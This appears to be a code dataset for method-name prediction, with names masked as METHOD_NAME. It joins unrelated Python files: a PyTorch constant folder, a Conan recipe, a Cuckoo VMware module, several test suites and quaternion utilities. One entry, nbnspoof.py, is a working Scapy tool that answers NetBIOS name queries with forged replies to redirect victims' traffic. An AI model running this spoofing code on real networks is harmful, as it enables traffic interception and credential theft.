return self.unknown_value
out = super().run_node(node)
if node.op != "get_attr" and isinstance(out, torch.Tensor):
if not self.insertable_tensor_check(out):
return out
if self.METHOD_NAME(node):
return self.unknown_value
self.add_node_replacement(node, out)
flattened_node_inps = pytree.tree_flatten((node.args, node.kwargs))[0]
for n in flattened_node_inps:
if not isinstance(n, torch.fx.Node):
continue
self.replaced_uses[n] += 1
for to_delete in self.user_to_last_uses.get(node, []):
if self.replaced_uses[to_delete] == len(to_delete.users):
self.node_replacements.pop(to_delete, None)
return out
def insertable_tensor_check(self, tensor: torch.Tensor) -> bool:
return True
def add_node_replacement(self, node: torch.fx.Node, tensor: torch.Tensor) -> None:
self.node_replacements[node] = tensor
def run(self):
env = {}
for n in self.module.graph.nodes:
if n.op == "placeholder":
env[n] = self.unknown_value
return super().run(initial_env=env)
@torch.utils._python_dispatch._disable_current_modes()
def constant_fold(gm):
cf = ConstantFolder(gm, skip_constructors=True)
cf.run()
for node, constant in cf.node_replacements.items():
replace_node_with_constant(gm, node, constant)
erased_params = []
for node in gm.graph.nodes:
if node.op == "get_attr" and len(node.users) == 0:
delattr(gm, node.target)
erased_params.append(node)
for node in erased_params:
gm.graph.erase_node(node)
gm.graph.eliminate_dead_code()
gm.graph.lint()
gm.recompile() |
298,408 | fix msvc libname | from conan import ConanFile
from conan.tools.apple import fix_apple_shared_install_name
from conan.tools.env import VirtualBuildEnv
from conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, rm, rmdir
from conan.tools.gnu import PkgConfigDeps
from conan.tools.layout import basic_layout
from conan.tools.meson import Meson, MesonToolchain
import os
required_conan_version = ">=1.53.0"
class LibPslConan(ConanFile):
name = "libpsl"
description = "C library for the Public Suffix List"
homepage = "https://github.com/rockdaboot/libpsl"
topics = ("psl", "suffix", "TLD", "gTLD", ".com", ".net")
license = "GPL-2.0-or-later"
url = "https://github.com/conan-io/conan-center-index"
package_type = "library"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"with_idna": [False, "icu", "libidn", "libidn2"],
}
default_options = {
"shared": False,
"fPIC": True,
"with_idna": "icu",
}
def export_sources(self):
export_conandata_patches(self)
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
self.options.rm_safe("fPIC")
self.settings.rm_safe("compiler.cppstd")
self.settings.rm_safe("compiler.libcxx")
def layout(self):
basic_layout(self, src_folder="src")
def requirements(self):
if self.options.with_idna == "icu":
self.requires("icu/72.1")
elif self.options.with_idna == "libidn":
self.requires("libidn/1.36")
elif self.options.with_idna == "libidn2":
self.requires("libidn2/2.3.0")
if self.options.with_idna in ("libidn", "libidn2"):
self.requires("libunistring/0.9.10")
def build_requirements(self):
self.tool_requires("meson/1.0.0")
if not self.conf.get("tools.gnu:pkg_config", check_type=str):
self.tool_requires("pkgconf/1.9.3")
def source(self):
get(self, **self.conan_data["sources"][self.version], strip_root=True)
@property
def _idna_option(self):
return {
"False": "no",
"icu": "libicu",
}.get(str(self.options.with_idna), str(self.options.with_idna))
def generate(self):
env = VirtualBuildEnv(self)
env.generate()
tc = MesonToolchain(self)
tc.project_options["runtime"] = self._idna_option
tc.project_options["builtin"] = self._idna_option
tc.generate()
deps = PkgConfigDeps(self)
deps.generate()
def build(self):
apply_conandata_patches(self)
meson = Meson(self)
meson.configure()
meson.build()
def package(self):
copy(self, "COPYING", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
meson = Meson(self)
meson.install()
rm(self, "*.pdb", os.path.join(self.package_folder, "bin"))
rmdir(self, os.path.join(self.package_folder, "lib", "pkgconfig"))
fix_apple_shared_install_name(self)
METHOD_NAME(self)
def package_info(self):
self.cpp_info.set_property("pkg_config_name", "libpsl")
self.cpp_info.libs = ["psl"]
if self.settings.os == "Windows":
self.cpp_info.system_libs = ["ws2_32"]
if not self.options.shared:
self.cpp_info.defines = ["PSL_STATIC"]
def METHOD_NAME(conanfile, remove_lib_prefix=True):
"""remove lib prefix & change extension to .lib in case of cl like compiler"""
from conan.tools.files import rename
import glob
if not conanfile.settings.get_safe("compiler.runtime"):
return
libdirs = getattr(conanfile.cpp.package, "libdirs")
for libdir in libdirs:
for ext in [".dll.a", ".dll.lib", ".a"]:
full_folder = os.path.join(conanfile.package_folder, libdir)
for filepath in glob.glob(os.path.join(full_folder, f"*{ext}")):
libname = os.path.basename(filepath)[0:-len(ext)]
if remove_lib_prefix and libname[0:3] == "lib":
libname = libname[3:]
rename(conanfile, filepath, os.path.join(os.path.dirname(filepath), f"{libname}.lib")) |
298,409 | stop | import json
import logging
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from lib.cuckoo.common.abstracts import Machinery
from lib.cuckoo.common.exceptions import CuckooMachineError
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
log = logging.getLogger(__name__)
s = requests.Session()
s.verify = False
class VMwareREST(Machinery):
"""Virtualization layer for remote VMware REST Server."""
LABEL = "id"
def _initialize_check(self):
"""Check for configuration file and vmware setup.
@raise CuckooMachineError: if configuration is missing or wrong.
"""
if not self.options.vmwarerest.host:
raise CuckooMachineError("VMwareREST hostname/IP address missing, please add it to vmwarerest.conf")
self.host = self.options.vmwarerest.host
if not self.options.vmwarerest.port:
raise CuckooMachineError("VMwareREST server port address missing, please add it to vmwarerest.conf")
self.port = str(self.options.vmwarerest.port)
if not self.options.vmwarerest.username:
raise CuckooMachineError("VMwareREST username missing, please add it to vmwarerest.conf")
self.username = self.options.vmwarerest.username
if not self.options.vmwarerest.password:
raise CuckooMachineError("VMwareREST password missing, please add it to vmwarerest.conf")
self.password = self.options.vmwarerest.password
super(VMwareREST, self)._initialize_check()
log.info("VMwareREST machinery module initialised (%s:%s)", self.host, self.port)
def get_vms(self):
vms = s.get(f"https://{self.host}:{self.port}/api/vms", auth=(self.username, self.password))
if "Authentication failed" in vms.text:
log.info("Authentication failed, please check credentials in vmwarerest.conf")
return None
return vms.json()
def get_vmmoid(self, id):
vms = self.get_vms()
if vms:
for vm in vms:
if vm["path"].endswith(f"{id}.vmx"):
return vm["id"]
log.info("There was a problem getting vmmoid for vm %s", id)
def set_vm_settings(self, id):
vmmoid = self.get_vmmoid(id)
if vmmoid:
status = s.put(
f"https://{self.host}:{self.port}/api/vms/{vmmoid}",
data=json.dumps({}),
auth=(self.username, self.password),
)
if "Authentication failed" in status.text:
log.info("Authentication failed, please check credentials in vmwarerest.conf")
return None
log.info("There was a problem setting settings for vm %s", id)
def get_vm_settings(self, id):
vmmoid = self.get_vmmoid(id)
if vmmoid:
return s.get(
f"https://{self.host}:{self.port}/api/vms/{vmmoid}",
auth=(self.username, self.password),
)
log.info("There was a problem getting settings for vm %s", id)
def poweron_vm(self, id):
vmmoid = self.get_vmmoid(id)
if vmmoid:
log.info("Powering on vm %s", id)
status = s.put(
f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
auth=(self.username, self.password),
data="on",
headers={"content-type": "application/vnd.vmware.vmw.rest-v1+json"},
)
if "Authentication failed" in status.text:
log.info("Authentication failed, please check credentials in vmwarerest.conf")
return None
return status
log.info("There was a problem powering on vm %s", id)
def poweroff_vm(self, id):
vmmoid = self.get_vmmoid(id)
if vmmoid:
log.info("Powering off vm %s", id)
return s.put(
f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
auth=(self.username, self.password),
data="off",
headers={"content-type": "application/vnd.vmware.vmw.rest-v1+json"},
)
log.info("There was a problem powering off vm %s", id)
def get_power_for_vm(self, id):
vmmoid = self.get_vmmoid(id)
if vmmoid:
return s.get(
f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
auth=(self.username, self.password),
)
log.info("There was a problem querying power status for vm %s", id)
def start(self, id):
log.info("Starting vm %s", id)
self.METHOD_NAME(id)
self.poweron_vm(id)
def METHOD_NAME(self, id):
if self._is_running(id):
log.info("Stopping vm %s", id)
self.poweroff_vm(id)
def _revert(self, id, snapshot):
log.info("Revert snapshot for vm %s: %s", id, snapshot)
self.poweroff_vm(id)
def _is_running(self, id):
log.info("Checking vm %s", id)
power_state = self.get_power_for_vm(id)
if power_state and "poweredOn" in power_state.text:
log.info("Vm %s is running", id)
return id
else:
log.info("Vm %s is not running", id) |
298,410 | test portfoliooptimization terms weights constant | import unittest
import numpy as np
from openqaoa.problems import PortfolioOptimization
def terms_list_equality(terms_list1, terms_list2):
"""
Check the terms equality between two terms list
where the order of edges do not matter.
"""
if len(terms_list1) != len(terms_list2):
bool = False
else:
for term1, term2 in zip(terms_list1, terms_list2):
bool = True if (term1 == term2 or term1 == term2[::-1]) else False
return bool
def terms_list_isclose(terms_list1, terms_list2):
"""
Check if the distance between two terms list
where the order of edges do not matter.
"""
if len(terms_list1) != len(terms_list2):
bool = False
else:
for term1, term2 in zip(terms_list1, terms_list2):
bool = (
True
if np.isclose(term1, term2) or np.isclose(term1, term2[::-1])
else False
)
return bool
class TestPortfolioOptimization(unittest.TestCase):
"""Tests for PortfoliaOptimization class"""
def METHOD_NAME(self):
"""Test terms,weights,constant of QUBO generated by PortfolioOptimization class"""
po_terms = [[0, 1], [0, 2], [1, 2], [0], [1], [2]]
po_weights = [0.505, 0.505, 0.505, 0.535, 0.535, 0.535]
po_constant = 0.8799999999999999
mu = [0.1, 0.1, 0.1]
sigma = [[0.01, 0.01, 0.01], [0.01, 0.01, 0.01], [0.01, 0.01, 0.01]]
risk_factor = 0.1
budget = 2
penalty = 1
qubo = PortfolioOptimization(mu, sigma, risk_factor, budget, penalty).qubo
terms, weights = qubo.terms, qubo.weights
constant = qubo.constant
self.assertEqual(weights, po_weights)
self.assertEqual(terms, po_terms)
self.assertEqual(po_constant, constant)
def test_portfoliooptimization_random_instance(self):
"""Test random instance method of PortfolioOptimization problem class"""
seed = 1234
rng = np.random.default_rng(seed)
num_assets = 3
risk_factor = 0.1
budget = 2
penalty = 1
mu_bounds = [-0.1, 0.1]
sigma_bounds = [-0.01, 0.01]
mu = [
(mu_bounds[1] - mu_bounds[0]) * rng.random() + mu_bounds[0]
for _ in range(num_assets)
]
sigma = [[0 for i in range(num_assets)] for j in range(num_assets)]
for i in range(num_assets):
for j in range(num_assets):
sigma[i][j] = (
sigma_bounds[1] - sigma_bounds[0]
) * rng.random() + sigma_bounds[0]
qubo = PortfolioOptimization(mu, sigma, risk_factor, budget, penalty).qubo
qubo_random = PortfolioOptimization.random_instance(
mu_bounds=mu_bounds,
sigma_bounds=sigma_bounds,
risk_factor=risk_factor,
budget=budget,
seed=seed,
penalty=penalty,
num_assets=num_assets,
).qubo
self.assertEqual(qubo.weights, qubo_random.weights)
self.assertEqual(qubo.terms, qubo_random.terms)
self.assertEqual(qubo.constant, qubo_random.constant)
def test_portfoliooptimization_classical_sol(self):
"""Test the portfolio optimization set random instance method classical solution"""
seed = 1234
po_sol = PortfolioOptimization.random_instance(
num_assets=10, seed=seed
).classical_solution()
sol = {
"asset_0": 1.0,
"asset_1": 1.0,
"asset_2": 1.0,
"asset_3": 0,
"asset_4": 0,
"asset_5": 0,
"asset_6": 0,
"asset_7": 1.0,
"asset_8": 1.0,
"asset_9": 0,
}
self.assertEqual(po_sol, sol)
def test_portfoliooptimization_plot(self):
"""Test portfolio optimization random instance method"""
import matplotlib.pyplot as plt
seed = 1234
portfoliooptimization_random_prob = PortfolioOptimization.random_instance(
num_assets=12, budget=8, seed=seed
)
sol = portfoliooptimization_random_prob.classical_solution()
figure = portfoliooptimization_random_prob.plot_solution(sol)
self.assertTrue(isinstance(figure, plt.Figure))
fig, ax = plt.subplots(figsize=(5, 5))
self.assertTrue(
portfoliooptimization_random_prob.plot_solution(sol, ax=ax) == None
)
if __name__ == "__main__":
unittest.main() |
298,411 | usage | #!/usr/bin/env python2
#
# nbnspoof.py
# 03-27-2007
# Robert Wesley McGrew
# wesley@mcgrewsecurity.com
#
# http://mcgrewsecurity.com
#
# Keeping things simple: You may use this code however you see fit, so
# long as you give me proper credit. Email me if you have any
# questions.
import sys
import getopt
import re
from scapy import *
global verbose
global regexp
global ip
global interface
global mac_addr
def METHOD_NAME():
print """Usage:
nbnspoof.py [-v] -i <interface> -n <regexp> -h <ip address> -m <MAC>
-v Verbose output of sniffed NBNS name queries, and responses sent
-i The interface you want to sniff and send on
-n A regular expression applied to each query to determine whether a
spoofed response will be sent
-h The IP address that will be sent in spoofed responses
-m The source MAC address for spoofed responses
"""
return
def pack_ip(addr):
temp = IP(src=addr)
return str(temp)[0x0c:0x10]
def unpack_ip(bin):
temp = IP()
temp = str(temp)[:0x0c] + bin + str(temp)[0x10:]
temp = IP(temp)
return temp.src
def get_packet(pkt):
global verbose
global regexp
global ip
global interface
global mac_addr
if not pkt.getlayer(NBNSQueryRequest):
return
if pkt.FLAGS & 0x8000:
query = False
addr = unpack_ip(str(pkt.getlayer(Raw))[8:])
else:
query = True
if verbose:
print str(pkt.NAME_TRN_ID) + ":",
if query:
print "Q",
else:
print "R",
print "SRC:" + pkt.getlayer(IP).src + " DST:" + pkt.getlayer(IP).dst,
if query:
print 'NAME:"' + pkt.QUESTION_NAME + '"'
else:
print 'NAME:"' + pkt.QUESTION_NAME + '"',
print 'IP:' + addr
if query and regexp.match(pkt.QUESTION_NAME.rstrip(),1):
response = Ether(dst=pkt.src,src=mac_addr)
response /= IP(dst=pkt.getlayer(IP).src,src=ip)
response /= UDP(sport=137,dport=137)
response /= NBNSQueryRequest(NAME_TRN_ID=pkt.getlayer(NBNSQueryRequest).NAME_TRN_ID,\
FLAGS=0x8500,\
QDCOUNT=0,\
ANCOUNT=1,\
NSCOUNT=0,\
ARCOUNT=0,\
QUESTION_NAME=pkt.getlayer(NBNSQueryRequest).QUESTION_NAME,\
SUFFIX=pkt.getlayer(NBNSQueryRequest).SUFFIX,\
NULL=0,\
QUESTION_TYPE=pkt.getlayer(NBNSQueryRequest).QUESTION_TYPE,\
QUESTION_CLASS=pkt.getlayer(NBNSQueryRequest).QUESTION_CLASS)
response /= Raw()
# Time to live: 3 days, 11 hours, 20 minutes
response.getlayer(Raw).load += '\x00\x04\x93\xe0'
# Data length: 6
response.getlayer(Raw).load += '\x00\x06'
# Flags: (B-node, unique)
response.getlayer(Raw).load += '\x00\x00'
# The IP we're giving them:
response.getlayer(Raw).load += pack_ip(ip)
sendp(response,iface=interface,verbose=0)
if verbose:
print 'Sent spoofed reply to #' + str(response.getlayer(NBNSQueryRequest).NAME_TRN_ID)
return
def main():
global verbose
global regexp
global ip
global interface
global mac_addr
try:
opts, args = getopt.getopt(sys.argv[1:],"vi:n:h:m:")
except:
METHOD_NAME()
sys.exit(1)
verbose = False
interface = None
name_regexp = None
ip = None
mac_addr = None
for o, a in opts:
if o == '-v':
verbose = True
if o == '-i':
interface = a
if o == '-n':
name_regexp = a
if o == '-h':
ip = a
if o == '-m':
mac_addr = a
if args or not ip or not name_regexp or not interface or not mac_addr:
METHOD_NAME()
sys.exit(1)
regexp = re.compile(name_regexp,re.IGNORECASE)
sniff(iface=interface,filter="udp and port 137",store=0,prn=get_packet)
return
if __name__ == "__main__":
main() |
298,412 | rad to deg | import math, uuid
from adsk.core import Vector3D, Base
from adsk.fusion import Component, Occurrence
# from proto.proto_out import types_pb2
def guid_component(comp: Component) -> str:
return f"{comp.entityToken}_{comp.id}"
def guid_occurrence(occ: Occurrence) -> str:
return f"{occ.entityToken}_{guid_component(occ.component)}"
def guid_none(_: None) -> str:
return str(uuid.uuid4())
def fill_info(proto_obj, fus_object, override_guid=None) -> None:
construct_info("", proto_obj, fus_object=fus_object, GUID=override_guid)
def construct_info(name: str, proto_obj, version=5, fus_object=None, GUID=None) -> None:
"""Constructs a info object from either a name or a fus_object
Args:
name (str): possible name
version (int, optional): version. Defaults to 1.
fus_object (adsk object, optional): Autodesk Object with name param. Defaults to None.
GUID (str, optional): Preset GUID. Defaults to None.
Raises:
ValueError: If name and fus_object are none
Returns:
types_pb2.Info: Info object
"""
proto_obj.info.version = version
if fus_object is not None:
proto_obj.info.name = fus_object.name
elif name is not None:
proto_obj.info.name = name
else:
raise ValueError("Cannot construct info from no name or fus_object")
if GUID is not None:
proto_obj.info.GUID = str(GUID)
else:
try:
# attempt to get entity token
proto_obj.info.GUID = fus_object.entityToken
except:
# fails and gets new uuid
proto_obj.info.GUID = str(uuid.uuid4())
# My previous function was alot more optimized however now I realize the bug was this doesn't work well with degrees
def euler_to_quaternion(r):
(yaw, pitch, roll) = (r[0], r[1], r[2])
qx = math.sin(roll / 2) * math.cos(pitch / 2) * math.cos(yaw / 2) - math.cos(
roll / 2
) * math.sin(pitch / 2) * math.sin(yaw / 2)
qy = math.cos(roll / 2) * math.sin(pitch / 2) * math.cos(yaw / 2) + math.sin(
roll / 2
) * math.cos(pitch / 2) * math.sin(yaw / 2)
qz = math.cos(roll / 2) * math.cos(pitch / 2) * math.sin(yaw / 2) - math.sin(
roll / 2
) * math.sin(pitch / 2) * math.cos(yaw / 2)
qw = math.cos(roll / 2) * math.cos(pitch / 2) * math.cos(yaw / 2) + math.sin(
roll / 2
) * math.sin(pitch / 2) * math.sin(yaw / 2)
return [qx, qy, qz, qw]
def METHOD_NAME(rad):
"""Very simple method to convert Radians to degrees
Args:
rad (float): radians unit
Returns:
float: degrees
"""
return (rad * 180) / math.pi
def quaternion_to_euler(qx, qy, qz, qw):
"""Takes in quat values and converts to degrees
- roll is x axis - atan2(2(qwqy + qzqw), 1-2(qy^2 + qz^2))
- pitch is y axis - asin(2(qxqz - qwqy))
- yaw is z axis - atan2(2(qxqw + qyqz), 1-2(qz^2+qw^3))
Args:
qx (float): quat_x
qy (float): quat_y
qz (float): quat_z
qw (float): quat_w
Returns:
roll: x value in degrees
pitch: y value in degrees
yaw: z value in degrees
"""
# roll
sr_cp = 2 * ((qw * qx) + (qy * qz))
cr_cp = 1 - (2 * ((qx * qx) + (qy * qy)))
roll = math.atan2(sr_cp, cr_cp)
# pitch
sp = 2 * ((qw * qy) - (qz * qx))
if abs(sp) >= 1:
pitch = math.copysign(math.pi / 2, sp)
else:
pitch = math.asin(sp)
# yaw
sy_cp = 2 * ((qw * qz) + (qx * qy))
cy_cp = 1 - (2 * ((qy * qy) + (qz * qz)))
yaw = math.atan2(sy_cp, cy_cp)
# convert to degrees
roll = METHOD_NAME(roll)
pitch = METHOD_NAME(pitch)
yaw = METHOD_NAME(yaw)
# round and return
return round(roll, 4), round(pitch, 4), round(yaw, 4)
def throwZero():
"""Simple function to report incorrect quat values
Raises:
RuntimeError: Error describing the issue
"""
raise RuntimeError(
"While computing the quaternion the trace was reported as 0 which is invalid"
)
def spatial_to_quaternion(mat):
"""Takes a 1D Spatial Transform Matrix and derives rotational quaternion
I wrote this however it is difficult to extensibly test so use with caution
Args:
mat (list): spatial transform matrix
Raises:
RuntimeError: matrix is not of the correct size
Returns:
x, y, z, w: float representation of quaternions
"""
if len(mat) > 15:
trace = mat[0] + mat[5] + mat[10]
if trace > 0:
s = math.sqrt(trace + 1.0) * 2
if s == 0:
throwZero()
qw = 0.25 * s
qx = (mat[9] - mat[6]) / s
qy = (mat[2] - mat[8]) / s
qz = (mat[4] - mat[1]) / s
elif (mat[0] > mat[5]) and (mat[0] > mat[8]):
s = math.sqrt(1.0 + mat[0] - mat[5] - mat[10]) * 2.0
if s == 0:
throwZero()
qw = (mat[9] - mat[6]) / s
qx = 0.25 * s
qy = (mat[1] + mat[4]) / s
qz = (mat[2] + mat[8]) / s
elif mat[5] > mat[10]:
s = math.sqrt(1.0 + mat[5] - mat[0] - mat[10]) * 2.0
if s == 0:
throwZero()
qw = (mat[2] - mat[8]) / s
qx = (mat[1] + mat[4]) / s
qy = 0.25 * s
qz = (mat[6] + mat[9]) / s
else:
s = math.sqrt(1.0 + mat[10] - mat[0] - mat[5]) * 2.0
if s == 0:
throwZero()
qw = (mat[4] - mat[1]) / s
qx = (mat[2] + mat[8]) / s
qy = (mat[6] + mat[9]) / s
qz = 0.25 * s
# normalizes the value - as demanded by unity
qx, qy, qz, qw = normalize_quaternion(qx, qy, qz, qw)
# So these quat values need to be reversed? I have no idea why at the moment
return round(qx, 13), round(-qy, 13), round(-qz, 13), round(qw, 13)
else:
raise RuntimeError(
"Supplied matrix to spatial_to_quaternion is not a 1D spatial matrix in size."
)
def normalize_quaternion(x, y, z, w):
f = 1.0 / math.sqrt((x * x) + (y * y) + (z * z) + (w * w))
return x * f, y * f, z * f, w * f
def _getAngleTo(vec_origin: list, vec_current: Vector3D) -> int:
origin = Vector3D.create(vec_origin[0], vec_origin[1], vec_origin[2])
val = origin.angleTo(vec_current)
deg = val * (180 / math.pi)
return val |
298,413 | test auxiliary file object | import logging
import responses
from importer.loader import CCEgovLoader
from importer.tests.utils import spurious_500
logger = logging.getLogger(__name__)
meeting_with_auxiliary_file_object = {
"id": "https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664",
"type": "https://schema.oparl.org/1.1/Meeting",
"name": "Sitzung des Projektbeirates Behindertenpolitischer Teilhabeplan",
"meetingState": "eingeladen",
"cancelled": False,
"start": "2021-05-11T17:00:00+02:00",
"end": "2021-05-12T00:00:00+02:00",
"organization": [
"https://www.bonn.sitzung-online.de/public/oparl/organizations?typ=gr&id=334"
],
"invitation": {
"id": (
"https://www.bonn.sitzung-online.de/public/oparl/files?id=2026137&dtyp=108"
),
"type": "https://schema.oparl.org/1.1/File",
"name": "Öffentliche Tagesordnung",
"date": "2021-04-27T21:51:03+02:00",
"fileName": "37.docx",
"mimeType": "docx",
"size": 0,
"accessUrl": "https://www.bonn.sitzung-online.de/public/doc?DOLFDNR=2026137&DOCTYP=108&OTYP=41",
"downloadUrl": "",
"created": "2021-05-01T10:32:32+02:00",
"modified": "2021-05-01T10:32:32+02:00",
"deleted": False,
},
"auxiliaryFile": {
"id": (
"https://www.bonn.sitzung-online.de/public/oparl/files?id=268781&dtyp=134"
),
"type": "https://schema.oparl.org/1.1/File",
"name": "Alle Anlagen öffentlich",
"date": "2021-04-28T09:02:04+02:00",
"fileName": "81.pdf",
"mimeType": "pdf",
"size": 553767,
"accessUrl": "https://www.bonn.sitzung-online.de/public/doc?DOLFDNR=268781&DOCTYP=134&OTYP=41",
"downloadUrl": "",
"created": "2021-05-01T10:32:32+02:00",
"modified": "2021-05-01T10:32:32+02:00",
"deleted": False,
},
"agendaItem": [
{
"id": (
"https://www.bonn.sitzung-online.de/public/oparl/agendaItems?id=2002135"
),
"type": "https://schema.oparl.org/1.1/AgendaItem",
"name": "Einführung und Verpflichtung",
"number": "1",
"order": 100001,
"meeting": (
"https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664"
),
"created": "2021-05-01T10:32:33+02:00",
"modified": "2021-05-01T10:32:33+02:00",
"deleted": False,
}
],
"web": "https://www.bonn.sitzung-online.de/public/to010?SILFDNR=664",
"created": "2021-04-25T22:31:05+02:00",
"modified": "2021-04-25T22:31:05+02:00",
"deleted": False,
}
def test_spurious_500(caplog):
spurious_500(CCEgovLoader({}))
assert caplog.messages == [
"Got an 500 for a CC e-gov request, retrying: 500 Server Error: Internal Server"
" Error for url:"
" https://ratsinfo.leipzig.de/bi/oparl/1.0/papers.asp?body=2387&p=2"
]
def METHOD_NAME(caplog):
loader = CCEgovLoader({})
with responses.RequestsMock() as requests_mock:
requests_mock.add(
requests_mock.GET,
meeting_with_auxiliary_file_object["id"],
json=meeting_with_auxiliary_file_object,
)
loaded = loader.load(meeting_with_auxiliary_file_object["id"])
assert isinstance(loaded["auxiliaryFile"], list)
assert caplog.messages == [
"auxiliaryFile is supposed to be an array of objects, but is an object (in "
"https://www.bonn.sitzung-online.de/public/oparl/meetings?id=664)"
]
def test_broken_json(pytestconfig, caplog):
"""Broken JSON with control character (U+0000 through U+001F except \n) that is not escaped"""
loader = CCEgovLoader({})
with responses.RequestsMock() as requests_mock:
requests_mock.add(
requests_mock.GET,
"https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664",
pytestconfig.rootpath.joinpath(
"testdata/broken_json.broken_json"
).read_text(),
)
loaded = loader.load(
"https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664"
)
print(loaded["name"])
assert len(loaded["name"]) == 127
assert caplog.messages == [
"The server returned invalid json. "
"This is a bug in the OParl implementation: "
"https://ratsinfo.braunschweig.de/bi/oparl/1.0/papers.asp?id=1664"
] |
298,414 | test latin1 issue | """
Unit tests for bipartite edgelists.
"""
import io
import os
import tempfile
import pytest
import networkx as nx
from networkx.algorithms import bipartite
from networkx.utils import edges_equal, graphs_equal, nodes_equal
class TestEdgelist:
@classmethod
def setup_class(cls):
cls.G = nx.Graph(name="test")
e = [("a", "b"), ("b", "c"), ("c", "d"), ("d", "e"), ("e", "f"), ("a", "f")]
cls.G.add_edges_from(e)
cls.G.add_nodes_from(["a", "c", "e"], bipartite=0)
cls.G.add_nodes_from(["b", "d", "f"], bipartite=1)
cls.G.add_node("g", bipartite=0)
cls.DG = nx.DiGraph(cls.G)
cls.MG = nx.MultiGraph()
cls.MG.add_edges_from([(1, 2), (1, 2), (1, 2)])
cls.MG.add_node(1, bipartite=0)
cls.MG.add_node(2, bipartite=1)
def test_read_edgelist_1(self):
s = b"""\
# comment line
1 2
# comment line
2 3
"""
bytesIO = io.BytesIO(s)
G = bipartite.read_edgelist(bytesIO, nodetype=int)
assert edges_equal(G.edges(), [(1, 2), (2, 3)])
def test_read_edgelist_3(self):
s = b"""\
# comment line
1 2 {'weight':2.0}
# comment line
2 3 {'weight':3.0}
"""
bytesIO = io.BytesIO(s)
G = bipartite.read_edgelist(bytesIO, nodetype=int, data=False)
assert edges_equal(G.edges(), [(1, 2), (2, 3)])
bytesIO = io.BytesIO(s)
G = bipartite.read_edgelist(bytesIO, nodetype=int, data=True)
assert edges_equal(
G.edges(data=True), [(1, 2, {"weight": 2.0}), (2, 3, {"weight": 3.0})]
)
def test_write_edgelist_1(self):
fh = io.BytesIO()
G = nx.Graph()
G.add_edges_from([(1, 2), (2, 3)])
G.add_node(1, bipartite=0)
G.add_node(2, bipartite=1)
G.add_node(3, bipartite=0)
bipartite.write_edgelist(G, fh, data=False)
fh.seek(0)
assert fh.read() == b"1 2\n3 2\n"
def test_write_edgelist_2(self):
fh = io.BytesIO()
G = nx.Graph()
G.add_edges_from([(1, 2), (2, 3)])
G.add_node(1, bipartite=0)
G.add_node(2, bipartite=1)
G.add_node(3, bipartite=0)
bipartite.write_edgelist(G, fh, data=True)
fh.seek(0)
assert fh.read() == b"1 2 {}\n3 2 {}\n"
def test_write_edgelist_3(self):
fh = io.BytesIO()
G = nx.Graph()
G.add_edge(1, 2, weight=2.0)
G.add_edge(2, 3, weight=3.0)
G.add_node(1, bipartite=0)
G.add_node(2, bipartite=1)
G.add_node(3, bipartite=0)
bipartite.write_edgelist(G, fh, data=True)
fh.seek(0)
assert fh.read() == b"1 2 {'weight': 2.0}\n3 2 {'weight': 3.0}\n"
def test_write_edgelist_4(self):
fh = io.BytesIO()
G = nx.Graph()
G.add_edge(1, 2, weight=2.0)
G.add_edge(2, 3, weight=3.0)
G.add_node(1, bipartite=0)
G.add_node(2, bipartite=1)
G.add_node(3, bipartite=0)
bipartite.write_edgelist(G, fh, data=[("weight")])
fh.seek(0)
assert fh.read() == b"1 2 2.0\n3 2 3.0\n"
def test_unicode(self):
G = nx.Graph()
name1 = chr(2344) + chr(123) + chr(6543)
name2 = chr(5543) + chr(1543) + chr(324)
G.add_edge(name1, "Radiohead", **{name2: 3})
G.add_node(name1, bipartite=0)
G.add_node("Radiohead", bipartite=1)
fd, fname = tempfile.mkstemp()
bipartite.write_edgelist(G, fname)
H = bipartite.read_edgelist(fname)
assert graphs_equal(G, H)
os.close(fd)
os.unlink(fname)
def METHOD_NAME(self):
G = nx.Graph()
name1 = chr(2344) + chr(123) + chr(6543)
name2 = chr(5543) + chr(1543) + chr(324)
G.add_edge(name1, "Radiohead", **{name2: 3})
G.add_node(name1, bipartite=0)
G.add_node("Radiohead", bipartite=1)
fd, fname = tempfile.mkstemp()
pytest.raises(
UnicodeEncodeError, bipartite.write_edgelist, G, fname, encoding="latin-1"
)
os.close(fd)
os.unlink(fname)
def test_latin1(self):
G = nx.Graph()
name1 = "Bj" + chr(246) + "rk"
name2 = chr(220) + "ber"
G.add_edge(name1, "Radiohead", **{name2: 3})
G.add_node(name1, bipartite=0)
G.add_node("Radiohead", bipartite=1)
fd, fname = tempfile.mkstemp()
bipartite.write_edgelist(G, fname, encoding="latin-1")
H = bipartite.read_edgelist(fname, encoding="latin-1")
assert graphs_equal(G, H)
os.close(fd)
os.unlink(fname)
def test_edgelist_graph(self):
G = self.G
(fd, fname) = tempfile.mkstemp()
bipartite.write_edgelist(G, fname)
H = bipartite.read_edgelist(fname)
H2 = bipartite.read_edgelist(fname)
assert H is not H2 # they should be different graphs
G.remove_node("g") # isolated nodes are not written in edgelist
assert nodes_equal(list(H), list(G))
assert edges_equal(list(H.edges()), list(G.edges()))
os.close(fd)
os.unlink(fname)
def test_edgelist_integers(self):
G = nx.convert_node_labels_to_integers(self.G)
(fd, fname) = tempfile.mkstemp()
bipartite.write_edgelist(G, fname)
H = bipartite.read_edgelist(fname, nodetype=int)
# isolated nodes are not written in edgelist
G.remove_nodes_from(list(nx.isolates(G)))
assert nodes_equal(list(H), list(G))
assert edges_equal(list(H.edges()), list(G.edges()))
os.close(fd)
os.unlink(fname)
def test_edgelist_multigraph(self):
G = self.MG
(fd, fname) = tempfile.mkstemp()
bipartite.write_edgelist(G, fname)
H = bipartite.read_edgelist(fname, nodetype=int, create_using=nx.MultiGraph())
H2 = bipartite.read_edgelist(fname, nodetype=int, create_using=nx.MultiGraph())
